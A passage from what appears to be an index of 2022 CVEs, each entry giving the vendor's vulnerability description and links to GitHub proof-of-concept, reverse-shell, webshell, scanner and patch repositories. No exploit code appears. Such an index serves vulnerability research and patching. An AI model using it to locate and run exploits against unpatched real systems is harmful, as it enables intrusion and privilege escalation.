+- [Malwareman007/CVE-2022-36537](https://github.com/Malwareman007/CVE-2022-36537) + +### CVE-2022-36539 (2022-09-07) + +WeDayCare B.V Ouderapp before v1.1.22 allows attackers to alter the ID value within intercepted calls to gain access to data of other parents and children. + + +- [Fopje/CVE-2022-36539](https://github.com/Fopje/CVE-2022-36539) + +### CVE-2022-36553 (2022-08-29) + +Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi. + + +- [0xNslabs/CVE-2022-36553-PoC](https://github.com/0xNslabs/CVE-2022-36553-PoC) + +### CVE-2022-36663 (2022-09-06) + +Gluu Oxauth before v4.4.1 allows attackers to execute blind SSRF (Server-Side Request Forgery) attacks via a crafted request_uri parameter. + + +- [aqeisi/CVE-2022-36663-PoC](https://github.com/aqeisi/CVE-2022-36663-PoC) + +### CVE-2022-36752 (2022-07-28) + +png2webp v1.0.4 was discovered to contain an out-of-bounds write via the function w2p. This vulnerability is exploitable via a crafted png file. + + +- [Halcy0nic/CVE-2022-36752](https://github.com/Halcy0nic/CVE-2022-36752) + +### CVE-2022-36779 (2022-09-13) + +PROSCEND - PROSCEND / ADVICE .Ltd - G/5G Industrial Cellular Router (with GPS)4 Unauthenticated OS Command Injection Proscend M330-w / M33-W5 / M350-5G / M350-W5G / M350-6 / M350-W6 / M301-G / M301-GW ADVICE ICR 111WG / https://www.proscend.com/en/category/industrial-Cellular-Router/industrial-Cellular-Router.html https://cdn.shopify.com/s/files/1/0036/9413/3297/files/ADVICE_Industrial_4G_LTE_Cellular_Router_ICR111WG.pdf?v=1620814301 + + +- [rootDR/CVE-2022-36779](https://github.com/rootDR/CVE-2022-36779) +- [EmadYaY/CVE-2022-36779](https://github.com/EmadYaY/CVE-2022-36779) + +### CVE-2022-36804 (2022-08-25) + +Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew. + + +- [notdls/CVE-2022-36804](https://github.com/notdls/CVE-2022-36804) +- [notxesh/CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC) +- [JRandomSage/CVE-2022-36804-MASS-RCE](https://github.com/JRandomSage/CVE-2022-36804-MASS-RCE) +- [benjaminhays/CVE-2022-36804-PoC-Exploit](https://github.com/benjaminhays/CVE-2022-36804-PoC-Exploit) +- [Vulnmachines/bitbucket-cve-2022-36804](https://github.com/Vulnmachines/bitbucket-cve-2022-36804) +- [kljunowsky/CVE-2022-36804-POC](https://github.com/kljunowsky/CVE-2022-36804-POC) +- [Chocapikk/CVE-2022-36804-ReverseShell](https://github.com/Chocapikk/CVE-2022-36804-ReverseShell) +- [khal4n1/CVE-2022-36804](https://github.com/khal4n1/CVE-2022-36804) +- [0xEleven/CVE-2022-36804-ReverseShell](https://github.com/0xEleven/CVE-2022-36804-ReverseShell) +- [tahtaciburak/cve-2022-36804](https://github.com/tahtaciburak/cve-2022-36804) +- [Inplex-sys/CVE-2022-36804](https://github.com/Inplex-sys/CVE-2022-36804) +- [ColdFusionX/CVE-2022-36804](https://github.com/ColdFusionX/CVE-2022-36804) +- [devengpk/CVE-2022-36804](https://github.com/devengpk/CVE-2022-36804) +- [walnutsecurity/cve-2022-36804](https://github.com/walnutsecurity/cve-2022-36804) +- [imbas007/Atlassian-Bitbucket-CVE-2022-36804](https://github.com/imbas007/Atlassian-Bitbucket-CVE-2022-36804) + +### CVE-2022-36944 (2022-09-23) + +Scala 2.13.x before 2.13.9 has a Java deserialization chain in its JAR file. On its own, it cannot be exploited. There is only a risk in conjunction with Java object deserialization within an application. In such situations, it allows attackers to erase contents of arbitrary files, make network connections, or possibly run arbitrary code (specifically, Function0 functions) via a gadget chain. + + +- [yarocher/lazylist-cve-poc](https://github.com/yarocher/lazylist-cve-poc) + +### CVE-2022-36946 (2022-07-27) + +nfqnl_mangle in net/netfilter/nfnetlink_queue.c in the Linux kernel through 5.18.14 allows remote attackers to cause a denial of service (panic) because, in the case of an nf_queue verdict with a one-byte nfta_payload attribute, an skb_pull can encounter a negative skb->len. + + +- [Pwnzer0tt1/CVE-2022-36946](https://github.com/Pwnzer0tt1/CVE-2022-36946) +- [Satheesh575555/linux-4.19.72_CVE-2022-36946](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-36946) + +### CVE-2022-37017 (2022-12-01) + +Symantec Endpoint Protection (Windows) agent, prior to 14.3 RU6/14.3 RU5 Patch 1, may be susceptible to a Security Control Bypass vulnerability, which is a type of issue that can potentially allow a threat actor to circumvent existing security controls. This CVE applies narrowly to the Client User Interface Password protection and Policy Import/Export Password protection, if it has been enabled. + + +- [apeppels/CVE-2022-37017](https://github.com/apeppels/CVE-2022-37017) + +### CVE-2022-37032 (2022-09-19) + +An out-of-bounds read in the BGP daemon of FRRouting FRR before 8.4 may lead to a segmentation fault and denial of service. This occurs in bgp_capability_msg_parse in bgpd/bgp_packet.c. + + +- [spwpun/CVE-2022-37032](https://github.com/spwpun/CVE-2022-37032) + +### CVE-2022-37042 (2022-08-11) + +Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925. + + +- [GreyNoise-Intelligence/Zimbra_CVE-2022-37042-_CVE-2022-27925](https://github.com/GreyNoise-Intelligence/Zimbra_CVE-2022-37042-_CVE-2022-27925) +- [aels/CVE-2022-37042](https://github.com/aels/CVE-2022-37042) +- [0xf4n9x/CVE-2022-37042](https://github.com/0xf4n9x/CVE-2022-37042) + +### CVE-2022-37177 (2022-08-29) + +HireVue Hiring Platform V1.0 suffers from Use of a Broken or Risky Cryptographic Algorithm. NOTE: this is disputed by the vendor for multiple reasons, e.g., it is inconsistent with CVE ID assignment rules for cloud services, and no product with version V1.0 exists. Furthermore, the rail-fence cipher has been removed, and TLS 1.2 is now used for encryption. + + +- [JC175/CVE-2022-37177](https://github.com/JC175/CVE-2022-37177) + +### CVE-2022-37201 (2022-09-15) + +JFinal CMS 5.1.0 is vulnerable to SQL Injection. + + +- [AgainstTheLight/CVE-2022-37201](https://github.com/AgainstTheLight/CVE-2022-37201) + +### CVE-2022-37202 (2022-10-26) + +JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/advicefeedback/list + + +- [AgainstTheLight/CVE-2022-37202](https://github.com/AgainstTheLight/CVE-2022-37202) + +### CVE-2022-37203 (2022-09-19) + +JFinal CMS 5.1.0 is vulnerable to SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection. + + +- [AgainstTheLight/CVE-2022-37203](https://github.com/AgainstTheLight/CVE-2022-37203) + +### CVE-2022-37204 (2022-09-20) + +Final CMS 5.1.0 is vulnerable to SQL Injection. + + +- [AgainstTheLight/CVE-2022-37204](https://github.com/AgainstTheLight/CVE-2022-37204) + +### CVE-2022-37205 (2022-09-20) + +JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection. + + +- [AgainstTheLight/CVE-2022-37205](https://github.com/AgainstTheLight/CVE-2022-37205) + +### CVE-2022-37206 +- [AgainstTheLight/CVE-2022-37206](https://github.com/AgainstTheLight/CVE-2022-37206) + +### CVE-2022-37207 (2022-09-15) + +JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection + + +- [AgainstTheLight/CVE-2022-37207](https://github.com/AgainstTheLight/CVE-2022-37207) + +### CVE-2022-37208 (2022-10-13) + +JFinal CMS 5.1.0 is vulnerable to SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection. + + +- [AgainstTheLight/CVE-2022-37208](https://github.com/AgainstTheLight/CVE-2022-37208) + +### CVE-2022-37209 (2022-09-27) + +JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection. + + +- [AgainstTheLight/CVE-2022-37209](https://github.com/AgainstTheLight/CVE-2022-37209) + +### CVE-2022-37210 +- [AgainstTheLight/CVE-2022-37210](https://github.com/AgainstTheLight/CVE-2022-37210) + +### CVE-2022-37298 (2022-10-20) + +Shinken Solutions Shinken Monitoring Version 2.4.3 affected is vulnerable to Incorrect Access Control. The SafeUnpickler class found in shinken/safepickle.py implements a weak authentication scheme when unserializing objects passed from monitoring nodes to the Shinken monitoring server. + + +- [dbyio/cve-2022-37298](https://github.com/dbyio/cve-2022-37298) + +### CVE-2022-37332 (2022-11-21) + +A use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 12.0.1.12430. A specially-crafted PDF document can trigger the reuse of previously freed memory via misusing media player API, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled. + + +- [SpiralBL0CK/CVE-2022-37332-RCE-](https://github.com/SpiralBL0CK/CVE-2022-37332-RCE-) + +### CVE-2022-37434 (2022-08-05) + +zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference). + + +- [xen0bit/CVE-2022-37434_poc](https://github.com/xen0bit/CVE-2022-37434_poc) +- [Trinadh465/external_zlib_android-6.0.1_r22_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_android-6.0.1_r22_CVE-2022-37434) +- [Trinadh465/external_zlib_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_CVE-2022-37434) + +### CVE-2022-37703 (2022-09-13) + +In Amanda 3.5.1, an information leak vulnerability was found in the calcsize SUID binary. An attacker can abuse this vulnerability to know if a directory exists or not anywhere in the fs. The binary will use `opendir()` as root directly without checking the path, letting the attacker provide an arbitrary path. + + +- [MaherAzzouzi/CVE-2022-37703](https://github.com/MaherAzzouzi/CVE-2022-37703) + +### CVE-2022-37704 (2023-04-16) + +Amanda 3.5.1 allows privilege escalation from the regular user backup to root. The SUID binary located at /lib/amanda/rundump will execute /usr/sbin/dump as root with controlled arguments from the attacker which may lead to escalation of privileges, denial of service, and information disclosure. + + +- [MaherAzzouzi/CVE-2022-37704](https://github.com/MaherAzzouzi/CVE-2022-37704) + +### CVE-2022-37705 (2023-04-16) + +A privilege escalation flaw was found in Amanda 3.5.1 in which the backup user can acquire root privileges. The vulnerable component is the runtar SUID program, which is a wrapper to run /usr/bin/tar with specific arguments that are controllable by the attacker. This program mishandles the arguments passed to tar binary (it expects that the argument name and value are separated with a space; however, separating them with an equals sign is also supported), + + +- [MaherAzzouzi/CVE-2022-37705](https://github.com/MaherAzzouzi/CVE-2022-37705) + +### CVE-2022-37706 (2022-12-25) + +enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring. + + +- [MaherAzzouzi/CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit) +- [ECU-10525611-Xander/CVE-2022-37706](https://github.com/ECU-10525611-Xander/CVE-2022-37706) +- [junnythemarksman/CVE-2022-37706](https://github.com/junnythemarksman/CVE-2022-37706) +- [AleksPwn/CVE-2022-37706](https://github.com/AleksPwn/CVE-2022-37706) +- [TACTICAL-HACK/CVE-2022-37706-SUID](https://github.com/TACTICAL-HACK/CVE-2022-37706-SUID) +- [sanan2004/CVE-2022-37706](https://github.com/sanan2004/CVE-2022-37706) +- [KaoXx/CVE-2022-37706](https://github.com/KaoXx/CVE-2022-37706) + +### CVE-2022-37708 +- [thekevinday/docker_lightman_exploit](https://github.com/thekevinday/docker_lightman_exploit) + +### CVE-2022-37969 (2022-09-13) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [fortra/CVE-2022-37969](https://github.com/fortra/CVE-2022-37969) + +### CVE-2022-38029 (2022-10-11) + +Windows ALPC Elevation of Privilege Vulnerability + + +- [SpiralBL0CK/SIDECHANNEL-CVE-2022-38029](https://github.com/SpiralBL0CK/SIDECHANNEL-CVE-2022-38029) + +### CVE-2022-38181 (2022-10-25) + +The Arm Mali GPU kernel driver allows unprivileged users to access freed memory because GPU memory operations are mishandled. This affects Bifrost r0p0 through r38p1, and r39p0; Valhall r19p0 through r38p1, and r39p0; and Midgard r4p0 through r32p0. + + +- [Pro-me3us/CVE_2022_38181_Raven](https://github.com/Pro-me3us/CVE_2022_38181_Raven) +- [Pro-me3us/CVE_2022_38181_Gazelle](https://github.com/Pro-me3us/CVE_2022_38181_Gazelle) +- [R0rt1z2/CVE-2022-38181](https://github.com/R0rt1z2/CVE-2022-38181) + +### CVE-2022-38374 (2022-11-02) + +A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiADC 7.0.0 - 7.0.2 and 6.2.0 - 6.2.4 allows an attacker to execute unauthorized code or commands via the URL and User fields observed in the traffic and event logviews. + + +- [azhurtanov/CVE-2022-38374](https://github.com/azhurtanov/CVE-2022-38374) +- [M4fiaB0y/CVE-2022-38374](https://github.com/M4fiaB0y/CVE-2022-38374) + +### CVE-2022-38553 (2022-09-26) + +Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter. + + +- [4websecurity/CVE-2022-38553](https://github.com/4websecurity/CVE-2022-38553) + +### CVE-2022-38577 (2022-09-19) + +ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators. + + +- [sornram9254/CVE-2022-38577-Processmaker](https://github.com/sornram9254/CVE-2022-38577-Processmaker) + +### CVE-2022-38601 +- [jet-pentest/CVE-2022-38601](https://github.com/jet-pentest/CVE-2022-38601) + +### CVE-2022-38604 (2023-04-11) + +Wacom Driver 6.3.46-1 for Windows and lower was discovered to contain an arbitrary file deletion vulnerability. + + +- [LucaBarile/CVE-2022-38604](https://github.com/LucaBarile/CVE-2022-38604) + +### CVE-2022-38691 +- [TomKing062/CVE-2022-38691_38692](https://github.com/TomKing062/CVE-2022-38691_38692) + +### CVE-2022-38694 +- [TomKing062/CVE-2022-38694_unlock_bootloader](https://github.com/TomKing062/CVE-2022-38694_unlock_bootloader) +- [TheGammaSqueeze/Bootloader_Unlock_Anbernic_T820](https://github.com/TheGammaSqueeze/Bootloader_Unlock_Anbernic_T820) + +### CVE-2022-38725 (2023-01-23) + +An integer overflow in the RFC3164 parser in One Identity syslog-ng 3.0 through 3.37 allows remote attackers to cause a Denial of Service via crafted syslog input that is mishandled by the tcp or network function. syslog-ng Premium Edition 7.0.30 and syslog-ng Store Box 6.10.0 are also affected. + + +- [wdahlenburg/CVE-2022-38725](https://github.com/wdahlenburg/CVE-2022-38725) + +### CVE-2022-38766 (2023-01-03) + +The remote keyless system on Renault ZOE 2021 vehicles sends 433.92 MHz RF signals from the same Rolling Codes set for each door-open request, which allows for a replay attack. + + +- [MalHyuk/CVE-2022-38766](https://github.com/MalHyuk/CVE-2022-38766) + +### CVE-2022-38789 (2022-09-15) + +An issue was discovered in Airties Smart Wi-Fi before 2020-08-04. It allows attackers to change the main/guest SSID and the PSK to arbitrary values, and map the LAN, because of Insecure Direct Object Reference. + + +- [ProxyStaffy/Airties-CVE-2022-38789](https://github.com/ProxyStaffy/Airties-CVE-2022-38789) + +### CVE-2022-38813 (2022-11-25) + +PHPGurukul Blood Donor Management System 1.0 does not properly restrict access to admin/dashboard.php, which allows attackers to access all data of users, delete the users, add and manage Blood Group, and Submit Report. + + +- [RashidKhanPathan/CVE-2022-38813](https://github.com/RashidKhanPathan/CVE-2022-38813) + +### CVE-2022-39066 (2022-11-22) + +There is a SQL injection vulnerability in ZTE MF286R. Due to insufficient validation of the input parameters of the phonebook interface, an authenticated attacker could use the vulnerability to execute arbitrary SQL injection. + + +- [v0lp3/CVE-2022-39066](https://github.com/v0lp3/CVE-2022-39066) + +### CVE-2022-39073 (2023-01-06) + +There is a command injection vulnerability in ZTE MF286R, Due to insufficient validation of the input parameters, an attacker could use the vulnerability to execute arbitrary commands. + + +- [v0lp3/CVE-2022-39073](https://github.com/v0lp3/CVE-2022-39073) + +### CVE-2022-39196 (2022-09-04) + +Blackboard Learn 1.10.1 allows remote authenticated users to read unintended files by entering student credentials and then directly visiting a certain webapps/bbcms/execute/ URL. Note: The vendor disputes this stating this cannot be reproduced. + + +- [DayiliWaseem/CVE-2022-39196-](https://github.com/DayiliWaseem/CVE-2022-39196-) + +### CVE-2022-39197 (2022-09-22) + +An XSS (Cross Site Scripting) vulnerability was found in HelpSystems Cobalt Strike through 4.7 that allowed a remote attacker to execute HTML on the Cobalt Strike teamserver. To exploit the vulnerability, one must first inspect a Cobalt Strike payload, and then modify the username field in the payload (or create a new payload with the extracted information and then modify that username field to be malformed). + + +- [safe3s/CVE-2022-39197](https://github.com/safe3s/CVE-2022-39197) +- [zeoday/cobaltstrike4.5_cdf-1](https://github.com/zeoday/cobaltstrike4.5_cdf-1) +- [burpheart/cve-2022-39197](https://github.com/burpheart/cve-2022-39197) +- [xzajyjs/CVE-2022-39197-POC](https://github.com/xzajyjs/CVE-2022-39197-POC) +- [yqcs/CSPOC](https://github.com/yqcs/CSPOC) +- [purple-WL/Cobaltstrike-RCE-CVE-2022-39197](https://github.com/purple-WL/Cobaltstrike-RCE-CVE-2022-39197) +- [lovechoudoufu/about_cobaltstrike4.5_cdf](https://github.com/lovechoudoufu/about_cobaltstrike4.5_cdf) +- [burpheart/CVE-2022-39197-patch](https://github.com/burpheart/CVE-2022-39197-patch) +- [hluwa/cobaltstrike_swing_xss2rce](https://github.com/hluwa/cobaltstrike_swing_xss2rce) +- [4nth0ny1130/CVE-2022-39197-fix_patch](https://github.com/4nth0ny1130/CVE-2022-39197-fix_patch) +- [its-arun/CVE-2022-39197](https://github.com/its-arun/CVE-2022-39197) +- [TheCryingGame/CVE-2022-39197-RCE](https://github.com/TheCryingGame/CVE-2022-39197-RCE) +- [adeljck/CVE-2022-39197](https://github.com/adeljck/CVE-2022-39197) +- [xiao-zhu-zhu/pig_CS4.4](https://github.com/xiao-zhu-zhu/pig_CS4.4) +- [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test) + +### CVE-2022-39227 (2022-09-23) + +python-jwt is a module for generating and verifying JSON Web Tokens. Versions prior to 3.3.4 are subject to Authentication Bypass by Spoofing, resulting in identity spoofing, session hijacking or authentication bypass. An attacker who obtains a JWT can arbitrarily forge its contents without knowing the secret key. Depending on the application, this may for example enable the attacker to spoof other user's identities, hijack their sessions, or bypass authentication. Users should upgrade to version 3.3.4. There are no known workarounds. + + +- [user0x1337/CVE-2022-39227](https://github.com/user0x1337/CVE-2022-39227) +- [NoSpaceAvailable/CVE-2022-39227](https://github.com/NoSpaceAvailable/CVE-2022-39227) + +### CVE-2022-39253 (2022-10-19) + +Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source's `$GIT_DIR/objects` directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim's machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the `--recurse-submodules` option. Git does not create symbolic links in the `$GIT_DIR/objects` directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the `--local` optimization when on a shared machine, either by passing the `--no-local` option to `git clone` or cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning repositories from untrusted sources with `--recurse-submodules` or run `git config --global protocol.file.allow user`. + + +- [ssst0n3/docker-cve-2022-39253-poc](https://github.com/ssst0n3/docker-cve-2022-39253-poc) +- [HiImDarwin/NetworkSecurityFinalProject](https://github.com/HiImDarwin/NetworkSecurityFinalProject) + +### CVE-2022-39275 (2022-10-06) + +Saleor is a headless, GraphQL commerce platform. In affected versions some GraphQL mutations were not properly checking the ID type input which allowed to access database objects that the authenticated user may not be allowed to access. This vulnerability can be used to expose the following information: Estimating database row counts from tables with a sequential primary key or Exposing staff user and customer email addresses and full name through the `assignNavigation()` mutation. This issue has been patched in main and backported to multiple releases (3.7.17, 3.6.18, 3.5.23, 3.4.24, 3.3.26, 3.2.14, 3.1.24). Users are advised to upgrade. There are no known workarounds for this issue. + + +- [omar2535/CVE-2022-39275](https://github.com/omar2535/CVE-2022-39275) + +### CVE-2022-39299 (2022-10-12) + +Passport-SAML is a SAML 2.0 authentication provider for Passport, the Node.js authentication library. A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauthenticated attacks (e.g without access to a valid user) might also be feasible if generation of a signed message can be triggered. Users should upgrade to passport-saml version 3.2.2 or newer. The issue was also present in the beta releases of `node-saml` before version 4.0.0-beta.5. If you cannot upgrade, disabling SAML authentication may be done as a workaround. + + +- [doyensec/CVE-2022-39299_PoC_Generator](https://github.com/doyensec/CVE-2022-39299_PoC_Generator) + +### CVE-2022-39425 (2022-10-18) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows unauthenticated attacker with network access via VRDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [bob11vrdp/CVE-2022-39425](https://github.com/bob11vrdp/CVE-2022-39425) + +### CVE-2022-39802 (2022-10-11) + +SAP Manufacturing Execution - versions 15.1, 15.2, 15.3, allows an attacker to exploit insufficient validation of a file path request parameter. The intended file path can be manipulated to allow arbitrary traversal of directories on the remote server. The file content within each directory can be read which may lead to information disclosure. + + +- [vah13/CVE-2022-39802](https://github.com/vah13/CVE-2022-39802) +- [redrays-io/CVE-2022-39802](https://github.com/redrays-io/CVE-2022-39802) + +### CVE-2022-39838 (2022-09-05) + +Systematic FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via a UNC share pathname, and also allows absolute path traversal to local pathnames. + + +- [jet-pentest/CVE-2022-39838](https://github.com/jet-pentest/CVE-2022-39838) + +### CVE-2022-39841 +- [stealthcopter/CVE-2022-39841](https://github.com/stealthcopter/CVE-2022-39841) + +### CVE-2022-39952 (2023-02-16) + +A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request. + + +- [horizon3ai/CVE-2022-39952](https://github.com/horizon3ai/CVE-2022-39952) +- [shiyeshu/CVE-2022-39952_webshell](https://github.com/shiyeshu/CVE-2022-39952_webshell) +- [Chocapikk/CVE-2022-39952](https://github.com/Chocapikk/CVE-2022-39952) +- [dkstar11q/CVE-2022-39952-better](https://github.com/dkstar11q/CVE-2022-39952-better) + +### CVE-2022-39959 (2022-10-07) + +Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%\Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%\Panini\Everest Engine\EverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%\Panini\Everest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file. + + +- [usmarine2141/CVE-2022-39959](https://github.com/usmarine2141/CVE-2022-39959) + +### CVE-2022-39986 (2023-08-01) + +A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php. + + +- [mind2hex/CVE-2022-39986](https://github.com/mind2hex/CVE-2022-39986) +- [tucommenceapousser/RaspAP-CVE-2022-39986-PoC](https://github.com/tucommenceapousser/RaspAP-CVE-2022-39986-PoC) + +### CVE-2022-39987 (2023-08-01) + +A Command injection vulnerability in RaspAP 2.8.0 thru 2.9.2 allows an authenticated attacker to execute arbitrary OS commands as root via the "entity" POST parameters in /ajax/networking/get_wgkey.php. + + +- [miguelc49/CVE-2022-39987-2](https://github.com/miguelc49/CVE-2022-39987-2) +- [miguelc49/CVE-2022-39987-1](https://github.com/miguelc49/CVE-2022-39987-1) +- [miguelc49/CVE-2022-39987-3](https://github.com/miguelc49/CVE-2022-39987-3) + +### CVE-2022-40032 (2023-02-17) + +SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information. + + +- [h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated) + +### CVE-2022-40126 (2022-09-29) + +A misconfiguration in the Service Mode profile directory of Clash for Windows v0.19.9 allows attackers to escalate privileges and execute arbitrary commands when Service Mode is activated. + + +- [LovelyWei/CVE-2022-40126](https://github.com/LovelyWei/CVE-2022-40126) + +### CVE-2022-40127 (2022-11-14) + +A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0. + + +- [Mr-xn/CVE-2022-40127](https://github.com/Mr-xn/CVE-2022-40127) +- [jakabakos/CVE-2022-40127-Airflow-RCE](https://github.com/jakabakos/CVE-2022-40127-Airflow-RCE) + +### CVE-2022-40140 (2022-09-19) + +An origin validation error vulnerability in Trend Micro Apex One and Apex One as a Service could allow a local attacker to cause a denial-of-service on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. + + +- [mr-r3b00t/NotProxyShellHunter](https://github.com/mr-r3b00t/NotProxyShellHunter) +- [ZephrFish/NotProxyShellScanner](https://github.com/ZephrFish/NotProxyShellScanner) +- [ipsBruno/CVE-2022-40140-SCANNER](https://github.com/ipsBruno/CVE-2022-40140-SCANNER) + +### CVE-2022-40146 (2022-09-22) + +Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14. + + +- [cckuailong/CVE-2022-40146_Exploit_Jar](https://github.com/cckuailong/CVE-2022-40146_Exploit_Jar) +- [soulfoodisgood/CVE-2022-40146](https://github.com/soulfoodisgood/CVE-2022-40146) + +### CVE-2022-40297 (2022-09-08) + +UBports Ubuntu Touch 16.04 allows the screen-unlock passcode to be used for a privileged shell via Sudo. This passcode is only four digits, far below typical length/complexity for a user account's password. NOTE: a third party states "The described attack cannot be executed as demonstrated. + + +- [filipkarc/PoC-ubuntutouch-pin-privesc](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc) + +### CVE-2022-40317 (2022-09-09) + +OpenKM 6.3.11 allows stored XSS related to the javascript&colon; substring in an A element. + + +- [izdiwho/CVE-2022-40317](https://github.com/izdiwho/CVE-2022-40317) + +### CVE-2022-40347 (2023-02-17) + +SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information. + + +- [h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated) + +### CVE-2022-40348 (2023-02-18) + +Cross Site Scripting (XSS) vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'name' and 'email' parameters, allows attackers to execute arbitrary code. + + +- [h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated) + +### CVE-2022-40363 (2022-09-29) + +A buffer overflow in the component nfc_device_load_mifare_ul_data of Flipper Devices Inc., Flipper Zero before v0.65.2 allows attackers to cause a Denial of Service (DoS) via a crafted NFC file. + + +- [Olafdaf/CVE-2022-40363](https://github.com/Olafdaf/CVE-2022-40363) + +### CVE-2022-40470 (2022-11-21) + +Phpgurukul Blood Donor Management System 1.0 allows Cross Site Scripting via Add Blood Group Name Feature. + + +- [RashidKhanPathan/CVE-2022-40470](https://github.com/RashidKhanPathan/CVE-2022-40470) + +### CVE-2022-40471 (2022-10-31) + +Remote Code Execution in Clinic's Patient Management System v 1.0 allows Attacker to Upload arbitrary php webshell via profile picture upload functionality in users.php + + +- 